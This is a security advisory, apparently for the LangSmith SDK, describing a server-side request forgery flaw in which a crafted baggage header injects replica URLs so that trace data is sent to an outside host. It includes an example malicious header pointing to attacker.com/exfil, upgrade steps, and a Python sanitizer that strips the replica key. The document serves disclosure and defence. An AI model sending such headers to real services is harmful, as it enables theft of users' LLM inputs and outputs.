The LangSmith SDK's distributed tracing feature is vulnerable to Server-Side Request Forgery via malicious HTTP headers. An attacker can inject arbitrary api_url values through the baggage header, causing the SDK to exfiltrate sensitive trace data to attacker-controlled endpoints.
When using distributed tracing, the SDK parses incoming HTTP headers via RunTree.from_headers() in Python or RunTree.fromHeaders() in TypeScript. The baggage header can contain replica configurations including api_url and api_key fields.
Prior to the fix, these attacker-controlled values were accepted without validation. When a traced operation completes, the SDK's post() and patch() methods send run data to all configured replica URLs, including any injected by an attacker.
1. Attacker sends an HTTP request to a vulnerable service with a malicious baggage header:
   baggage: langsmith-replicas=[{"api_url":"https://attacker.com/exfil","project_name":"x"}]
2. The service parses the header via RunTree.from_headers(), storing the attacker's URL.
3. When the traced operation completes, the SDK sends the full run data (including LLM inputs, outputs, and metadata) to https://attacker.com/exfil
Applications are vulnerable if they:
- Use TracingMiddleware to automatically propagate tracing context
- Call RunTree.from_headers() / RunTree.fromHeaders() with untrusted HTTP headers
Update to the patched versions:
- Python: pip install "langsmith>=0.6.3"
- JavaScript: npm install "langsmith@>=0.4.6"
The fix filters incoming replica configurations to an allowlist of safe fields, removing api_url, api_key, and other credential fields.
If unable to upgrade immediately:
- Strip or validate the baggage header before passing to from_headers()
- Do not use TracingMiddleware with untrusted traffic
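The first workaround above, as an added example (not code from the LangSmith project): a framework-independent filter that removes the langsmith-replicas member from the baggage header before the headers reach from_headers(), and returns what it removed so the attempt can be logged. The function names and sample headers are assumptions constructed for illustration; the key name is the one shown in this advisory.

```python
from urllib.parse import unquote

BLOCKED_KEY = "langsmith-replicas"  # baggage key named in the advisory

# Constructed sample request headers; the replica value is the advisory's example.
SAMPLE = {
    "Host": "service.example",
    "Baggage": 'tenant=acme,langsmith-replicas='
               '[{"api_url":"https://attacker.com/exfil","project_name":"x"}]',
}


def sanitize_baggage(value):
    """Return (clean_value, dropped_members) for one baggage header value."""
    kept, dropped = [], []
    for member in value.split(","):
        member = member.strip()
        if not member:
            continue
        key, sep, _ = member.partition("=")
        # Compare the key after percent-decoding and case-folding so that
        # encoded or mixed-case spellings are caught as well.
        name = unquote(key).strip().lower()
        if not sep or name == BLOCKED_KEY:
            # No "=" means a malformed member, e.g. the tail of an
            # unencoded JSON value that was split on its own commas.
            dropped.append(member)
        else:
            kept.append(member)
    return ",".join(kept), dropped


def sanitize_headers(headers):
    """Copy headers, removing replica configuration from any baggage header."""
    clean, dropped = {}, []
    for name, value in headers.items():
        if name.lower() == "baggage":  # header names are case-insensitive
            value, removed = sanitize_baggage(value)
            dropped.extend(removed)
            if not value:
                continue  # nothing legitimate left, omit the header
        clean[name] = value
    return clean, dropped
```

Pass only the first return value on to from_headers(); a non-empty second value on traffic from an untrusted source is worth alerting on.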
{
"cwe_ids": [
"CWE-918"
],
"severity": "MODERATE",
"github_reviewed": true,
"nvd_published_at": "2026-02-09T21:15:48Z",
"github_reviewed_at": "2026-02-09T20:36:59Z"
}